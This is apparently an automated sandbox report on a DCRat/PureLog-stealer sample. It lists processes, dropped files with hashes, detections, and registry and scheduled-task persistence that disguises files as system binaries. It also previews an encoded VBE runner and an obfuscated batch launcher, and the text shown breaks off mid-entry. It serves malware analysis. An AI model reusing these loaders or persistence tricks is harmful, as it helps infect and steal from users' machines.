  Started: intoHostperf.exe (10 51); conhost.exe

intoHostperf.exe
  Dropped: C:\Users\user\Desktop\zmrZuvIB.log (PE32); C:\Users\user\Desktop\xpPRZvtG.log (PE32); C:\Users\user\Desktop\wtcqJyWC.log (PE32); 26 other malicious files
  Signatures: Antivirus detection for dropped file; Creates an undocumented autostart registry key; Machine Learning detection for dropped file; 4 other signatures
  Started: cmd.exe; csc.exe (4); csc.exe; 6 other processes

cmd.exe (child of intoHostperf.exe)
  Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
  Started: PING.EXE; 2 other processes

csc.exe (first instance)
  Dropped: C:\Program Files (x86)\...\msedge.exe (PE32)
  Signatures: Infects executable files (exe, dll, sys, html)
  Started: conhost.exe; cvtres.exe

csc.exe (second instance)
  Dropped: C:\Windows\...\SecurityHealthSystray.exe (PE32)
  Started: conhost.exe; cvtres.exe

6 other processes (children of intoHostperf.exe)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe; conhost.exe; 4 other processes

PING.EXE
  Started: Conhost.exe

                                    Submitted sample
                                    Source | Detection | Scanner | Label | Link
                                    DCobxod.exe | 56% | Virustotal | | Browse
                                    DCobxod.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    DCobxod.exe | 100% | Avira | VBS/Runner.VPG |
                                    DCobxod.exe | 100% | Joe Sandbox ML | |
                                    Dropped files
                                    Source | Detection | Scanner | Label | Link
                                    C:\ProgramData\SoftwareDistribution\winlogon.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\Recovery\upfc.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\Browserhost\intoHostperf.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe | 100% | Avira | VBS/Runner.VPG |
                                    C:\Browserhost\LaSqLWtOcizKrlm.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\Browserhost\LaSqLWtOcizKrlm.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat | 100% | Avira | BAT/Delbat.C |
                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\ProgramData\SoftwareDistribution\winlogon.exe | 100% | Joe Sandbox ML | |
                                    C:\Recovery\upfc.exe | 100% | Joe Sandbox ML | |
                                    C:\Browserhost\intoHostperf.exe | 100% | Joe Sandbox ML | |
                                    C:\Browserhost\LaSqLWtOcizKrlm.exe | 100% | Joe Sandbox ML | |
                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | |
                                    C:\Browserhost\LaSqLWtOcizKrlm.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\AkShQvXv.log | 8% | ReversingLabs | |
                                    C:\Users\user\Desktop\CdhQCsIu.log | 25% | ReversingLabs | |
                                    C:\Users\user\Desktop\DaJYXsXp.log | 21% | ReversingLabs | |
                                    C:\Users\user\Desktop\GTYGJoJn.log | 25% | ReversingLabs | |
                                    C:\Users\user\Desktop\HhGhtKRk.log | 8% | ReversingLabs | |
                                    C:\Users\user\Desktop\NzFoXiJZ.log | 21% | ReversingLabs | |
                                    C:\Users\user\Desktop\QQZxdmXS.log | 29% | ReversingLabs | |
                                    C:\Users\user\Desktop\QuHEOinP.log | 17% | ReversingLabs | |
                                    C:\Users\user\Desktop\TBFNkAhL.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                                    C:\Users\user\Desktop\TkyvVenI.log | 8% | ReversingLabs | |
                                    C:\Users\user\Desktop\WuUwVxTJ.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\XrvErxiE.log | 5% | ReversingLabs | |
                                    C:\Users\user\Desktop\ZuimMgmz.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                                    C:\Users\user\Desktop\bnxVycYy.log | 9% | ReversingLabs | |
                                    C:\Users\user\Desktop\jcBCwIrh.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                                    C:\Users\user\Desktop\kIWsDnNZ.log | 8% | ReversingLabs | |
                                    C:\Users\user\Desktop\nBlbpjyY.log | 12% | ReversingLabs | |
                                    C:\Users\user\Desktop\pEXJLSDT.log | 25% | ReversingLabs | |
                                    C:\Users\user\Desktop\urpInPSH.log | 17% | ReversingLabs | |
                                    C:\Users\user\Desktop\wtcqJyWC.log | 11% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                                    C:\Users\user\Desktop\xpPRZvtG.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\zmrZuvIB.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                                    No Antivirus matches
                                    No Antivirus matches
                                    No Antivirus matches
                                    No contacted domains info
                                    Name | Source | Malicious | Antivirus Detection | Reputation
                                    http://nuget.org/NuGet.exe | powershell.exe, 00000025.00000002.3566072235.000001FA2F442000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3560722723.00000188415C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://aka.ms/pscore68 | powershell.exe, 00000025.00000002.2369596905.000001FA1F3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F321E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D5EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86DC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://pesterbdd.com/images/Pester.png | powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000025.00000002.2369596905.000001FA1F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F322057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D60E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2369596905.000001FA1F3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F321E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D5EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86DC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://github.com/Pester/Pester | powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000025.00000002.2369596905.000001FA1F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F322057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D60E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://contoso.com/ | powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://nuget.org/nuget.exe | powershell.exe, 00000025.00000002.3566072235.000001FA2F442000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3560722723.00000188415C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3658740725.0000021210073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://contoso.com/License | powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://contoso.com/Icon | powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                            No contacted IP infos
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1590003
                                                            Start date and time:2025-01-13 13:18:11 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 11m 0s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of new started processes analysed:64
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Sample name:DCobxod.exe
                                                            Detection:MAL
                                                            Classification:mal100.spre.troj.expl.evad.winEXE@56/79@0/0
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:Failed
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, schtasks.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.253.45, 52.149.20.212
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 733812cm.n9shteam.in, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target intoHostperf.exe, PID 5828 because it is empty
                                                            • Not all processes were analyzed; the report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            Time | Type | Description
                                                            07:19:22 | API Interceptor | 156x Sleep call for process: powershell.exe modified
                                                            13:19:15 | Task Scheduler | Run new task: upfc path: "C:\Recovery\upfc.exe"
                                                            13:19:16 | Task Scheduler | Run new task: upfcu path: "C:\Recovery\upfc.exe"
                                                            13:19:19 | Task Scheduler | Run new task: explorere path: "C:\Users\Default\NetHood\explorer.exe"
                                                            13:19:19 | Task Scheduler | Run new task: LaSqLWtOcizKrlm path: "C:\Browserhost\LaSqLWtOcizKrlm.exe"
                                                            13:19:19 | Task Scheduler | Run new task: LaSqLWtOcizKrlmL path: "C:\Browserhost\LaSqLWtOcizKrlm.exe"
                                                            13:19:20 | Task Scheduler | Run new task: winlogon path: "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            13:19:20 | Task Scheduler | Run new task: winlogonw path: "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            13:19:21 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Recovery\upfc.exe"
                                                            13:19:23 | Task Scheduler | Run new task: explorer path: "C:\Users\Default\NetHood\explorer.exe"
                                                            13:19:24 | Task Scheduler | Run new task: intoHostperf path: "C:\Browserhost\intoHostperf.exe"
                                                            13:19:24 | Task Scheduler | Run new task: intoHostperfi path: "C:\Browserhost\intoHostperf.exe"
                                                            13:19:30 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlm "C:\Browserhost\LaSqLWtOcizKrlm.exe"
                                                            13:19:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            13:19:48 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Users\Default\NetHood\explorer.exe"
                                                            13:19:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run intoHostperf "C:\Browserhost\intoHostperf.exe"
                                                            13:20:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Recovery\upfc.exe"
                                                            13:20:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlm "C:\Browserhost\LaSqLWtOcizKrlm.exe"
                                                            13:20:25 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            13:20:34 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Users\Default\NetHood\explorer.exe"
                                                            13:20:43 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run intoHostperf "C:\Browserhost\intoHostperf.exe"
                                                            13:20:53 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Recovery\upfc.exe"
                                                            13:21:03 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlm "C:\Browserhost\LaSqLWtOcizKrlm.exe"
                                                            13:21:12 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            13:21:21 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Users\Default\NetHood\explorer.exe"
                                                            13:21:29 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run intoHostperf "C:\Browserhost\intoHostperf.exe"
                                                            13:21:46 | Autostart | Run: WinLogon Shell "C:\Recovery\upfc.exe"
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):194
                                                            Entropy (8bit):5.649145206495066
                                                            Encrypted:false
                                                            SSDEEP:6:xSRQCsyTqQL7s7SSWIK9geuhl9aR2t2btBM:URQCsyn/s7UNPGlsKo6
                                                            MD5:587E79F1259E7E719E60708AE6B0C800
                                                            SHA1:5E7C822F8664429E3ECC099BDC10DF8DCFB98C93
                                                            SHA-256:91D4C2D8931EEDFB4A0677887F1C7C9BF5B8BB32D5A3EF5420AFDAF8614F0386
                                                            SHA-512:4B0DCC10F0E2A2716B04E9F202D0E4984D2727188859B6B1F6F3751DF31C3FD1D671B8947A9D024551A92624FA64719E368AD9AAB02EC26B3B07766D4ED7E96F
                                                            Malicious:false
                                                            Preview:LzNk9wqw6DfNUvaZEhgV5CcnmAdRNKxcY6jClCs9nEU3LD70OqhDBKQIXk89SYjvQDzYLYxCygr0riciCmDgntaOqapAEtrPfinHOip02fOecZbyIZ7pUCIgmlsvsx7FzcVI4UUe7NoIe6vQ902ovB4caHfm04HFhIoADS4yEcsHYABqzbv24TTyi2sxysoDFi
                                                            Process:C:\Users\user\Desktop\DCobxod.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):193
                                                            Entropy (8bit):5.718995944823469
                                                            Encrypted:false
                                                            SSDEEP:6:G9t2wqK+NkLzWbHa/818nZNDd3RL1wQJR8qHUD/IfU1:G9FMCzWLaG4d3XBJSbv1
                                                            MD5:469F076B98518FC3F174277AE4E7C6C2
                                                            SHA1:F47B8EE20D1901242563BCA5949B2FC9B8DCCE32
                                                            SHA-256:27F62059A2E4543D324D2DC4B57FA3AFCCB086411EE077C136C9732800987DD9
                                                            SHA-512:6BF0A52C4BB33945C00C637FB50298975F060F4209F6C5655352A656B239CF47D78F4E1088EB7D0DF5CDE52915E704CEC485BABFA33284B501394A06AC40C214
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:#@~^qAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJA.Khk+D4WkOzJqTM"R8CDJ~,T~,0l^dnezQAAA==^#~@.
                                                            Process:C:\Users\user\Desktop\DCobxod.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):85
                                                            Entropy (8bit):5.24016648925236
                                                            Encrypted:false
                                                            SSDEEP:3:6VGXIRjydtpUFnNt2qTLVaT5A:6VGYFydtp4t2iLYNA
                                                            MD5:FB60A3F4D062529781B1856A97F6D2A8
                                                            SHA1:1DA3695E467BE7E3A89CE9C7DE7DB683E6E438FE
                                                            SHA-256:81FCF50EDA7D7A8A0170239AEE3D3741E2AB76D1AA7AF8800C2E47CF182DCDF0
                                                            SHA-512:1F99A3B004752DB78FB8E9E4D097F866BAD641CD196CCB6D639C40C4C3DDA87B5E1A7A7836C8A276B965AC50F1B8B43731BF12D592CD5993938769D1196593E4
                                                            Malicious:false
                                                            Preview:%zKbJqSWcrMp%%AHGFNCOCwVmBLH%..%YEb%"C:\Browserhost/intoHostperf.exe"%ekfRBEEBSUFTRl%
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with very long lines (823), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):823
                                                            Entropy (8bit):5.9024954624571935
                                                            Encrypted:false
                                                            SSDEEP:24:dAbeOiJ7T6YTsTdv8OX4RfcXD8xid0VHHyjpi:UsTv4ddX4RfcXD8AdWnyQ
                                                            MD5:E0B9C15C7C302A3A8D34DF75924255FD
                                                            SHA1:B3850147EE96BE03F38B3D04C27F59A939CB3626
                                                            SHA-256:D8D6D69C2F5D729F49B58FE8D5DA519141603BD50C00EBBA8ED7E7F348127454
                                                            SHA-512:0F9986899BDCACB100D15FB507EA694236F76B56EDF5444263997B8349AD52DBF2DA827841A42AD306E2EB4DA4280A5BD81CEF47BC3B935857B840B56AFCEFB7
                                                            Malicious:false
                                                            Preview:
                                                            Process:C:\Users\user\Desktop\DCobxod.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Browserhost\intoHostperf.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\intoHostperf.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):1168
                                                            Entropy (8bit):4.448520842480604
                                                            Encrypted:false
                                                            SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                            MD5:B5189FB271BE514BEC128E0D0809C04E
                                                            SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                            SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                            SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                            Malicious:false
                                                            Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4608
                                                            Entropy (8bit):3.8727823458802355
                                                            Encrypted:false
                                                            SSDEEP:48:6Wgm0taxZ8RxeOAkFJOcV4MKe28dcvqBHnuulB+hnqXSfbNtm:I1xvxVx98vkZTkZzNt
                                                            MD5:DE4F6401D8D489EC917D7DC5D36FF8D4
                                                            SHA1:FD40F597A54C2432380ADB5CFCD5CD7A443CD968
                                                            SHA-256:260332C53DFA834E346F4838EF5BF9360F4F53E3FF07B42A076826FA3094C01D
                                                            SHA-512:4FE8C63732251E31F5E146567B08E731E62BE638F6F67D2B7ABF68EA535BD839B1E4E49B65D267D88BE16C7F6A3E973C9C0BCB1B7F381BEFE85CF32391037B83
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................~'... ...@....@.. ....................................@.................................$'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with very long lines (387), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):387
                                                            Entropy (8bit):5.846870218789454
                                                            Encrypted:false
                                                            SSDEEP:6:OC6kEp+mqKjX31n32jLjWbNxVohnPVc3ccuF+pdzN/2BDpIsr7F8hFZu3BZQa:OC6fhV2jmBohtc3f62xwBDmsyhF0HB
                                                            MD5:E46A9356251ACDE28326FA3E8DE2DB15
                                                            SHA1:5E7F9E763E1E15E2DBA689ADFE7E7D09BD9FCE0A
                                                            SHA-256:7D9846BE6C026E210E4987E24F49BA6ED130FABD7EFED21BB45A2ED94C7EE735
                                                            SHA-512:4E4D4827B32275342C8753567A713BFA28C86FD321E4E7B32F0BD2BADC02168A293B4E777A1EC3CE7E910002D1D51F82F203FE4BF4E000F9E46587B119DA375B
                                                            Malicious:false
                                                            Preview:xvcdzAt9z07nJifQb7lhzAavG6taMQ6gtvjdNmjxb2jd4PNdLbcVC2hxUqX2RSxj4b3X8CCzYxF7b710sPOuxkd1NwJhPqgJFAicW0fJZm7OwkVWygKBDCvU7BJL3fksR51bZYe2uFVKnOEnawssgeFDOOfUqTQ3CO71s47ZCRR8rlqs7gvGw1Mw0yMK3JMazbHYRN4fySqONHWnhxXKiJGLCLB4rwg2F0JPdSbtlPSeL7iscjmGwB2pU6WFMAxBwyJW8GJPVnjT0mAFmSbIKaFD8d5g6VhkbQrXyMuWZXuJciyr6Qd3jp1VsFYfLnTAG82k5mQaiFswq6kZoNjp1nBvZVosyOLwDtCeqOwTADVd7Epvf807DoId6GLj8imT46s
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
